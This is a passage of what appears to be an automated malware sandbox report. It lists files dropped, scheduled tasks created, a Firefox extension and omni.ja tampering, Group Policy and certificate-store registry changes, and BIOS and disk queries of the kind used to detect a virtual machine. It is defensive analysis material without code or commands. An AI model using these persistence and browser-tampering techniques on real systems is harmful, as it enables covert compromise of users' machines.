| File opened (read-only) | \??\D: | C:\Users\Admin\AppData\Local\Temp\7zS05233879\setup.exe | N/A |
| File opened (read-only) | \??\F: | C:\Users\Admin\AppData\Local\Temp\7zS05233879\setup.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\eclbdtf.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\eclbdtf.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\eclbdtf.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_32201FF65E9A20A693462A3946A29CAE | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\eclbdtf.exe | N/A |
| File created | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\LPL9xJBa\HrDttahkOdAABIRdJv.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\LPL9xJBa\HrDttahkOdAABIRdJv.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\eclbdtf.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\eclbdtf.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\eclbdtf.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C02877841121CC45139CB51404116B25_A71D3C9ACFD0888B19B4EAA86FAA4437 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\eclbdtf.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C02877841121CC45139CB51404116B25_DE59F8C40B88A0DF57DC57DBBEDD7057 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\eclbdtf.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\eclbdtf.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_32201FF65E9A20A693462A3946A29CAE | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\eclbdtf.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C02877841121CC45139CB51404116B25_A71D3C9ACFD0888B19B4EAA86FAA4437 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\eclbdtf.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C02877841121CC45139CB51404116B25_DE59F8C40B88A0DF57DC57DBBEDD7057 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\eclbdtf.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\eclbdtf.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\eclbdtf.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\eclbdtf.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E52E4DB9468EB31D663A0754C2775A04 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\eclbdtf.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\eclbdtf.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\eclbdtf.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\eclbdtf.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E52E4DB9468EB31D663A0754C2775A04 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\eclbdtf.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\eclbdtf.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\eclbdtf.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\eclbdtf.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\eclbdtf.exe | N/A |
| File created | C:\Program Files (x86)\hMiQKFvmPLjeC\EbAyrXh.dll | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\eclbdtf.exe | N/A |
| File created | C:\Program Files (x86)\hMiQKFvmPLjeC\NdFpdWB.xml | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\eclbdtf.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\eclbdtf.exe | N/A |
| File created | C:\Program Files (x86)\OJBbginKvssDnbEKbsR\lRCdYHu.dll | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\eclbdtf.exe | N/A |
| File created | C:\Program Files (x86)\UQtSSXvqU\oSfFis.dll | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\eclbdtf.exe | N/A |
| File created | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\eclbdtf.exe | N/A |
| File created | C:\Program Files (x86)\UQtSSXvqU\DrWtGlG.xml | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\eclbdtf.exe | N/A |
| File created | C:\Program Files (x86)\ezMWJXFFLyUn\HjYSTVn.dll | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\eclbdtf.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\eclbdtf.exe | N/A |
| File created | C:\Program Files (x86)\AMqhlrBDqRJU2\LoCSjfcFdirsy.dll | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\eclbdtf.exe | N/A |
| File created | C:\Program Files (x86)\AMqhlrBDqRJU2\eobpTYI.xml | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\eclbdtf.exe | N/A |
| File created | C:\Program Files (x86)\OJBbginKvssDnbEKbsR\SgeNsET.xml | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\eclbdtf.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SystemTemp | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| File created | C:\Windows\Tasks\bEtnHIcecDUtXwQuWS.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\MRTHivZIQsRdEanwm.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| File created | C:\Windows\Tasks\FPIEUdZLMYPzsiUNM.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\OcPshDNvhDnVmSv.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
Enumerates physical storage devices
Program crash
NSIS installer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\LPL9xJBa\HrDttahkOdAABIRdJv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\LPL9xJBa\HrDttahkOdAABIRdJv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "7" | C:\Users\Admin\AppData\Local\Temp\LPL9xJBa\HrDttahkOdAABIRdJv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{d0a76a3e-0000-0000-0000-d01200000000} | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\eclbdtf.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\eclbdtf.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\eclbdtf.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{d0a76a3e-0000-0000-0000-d01200000000}\NukeOnDelete = "0" | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\eclbdtf.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\eclbdtf.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\SlowContextMenuEntries = 6024b221ea3a6910a2dc08002b30309d9d0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\eclbdtf.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
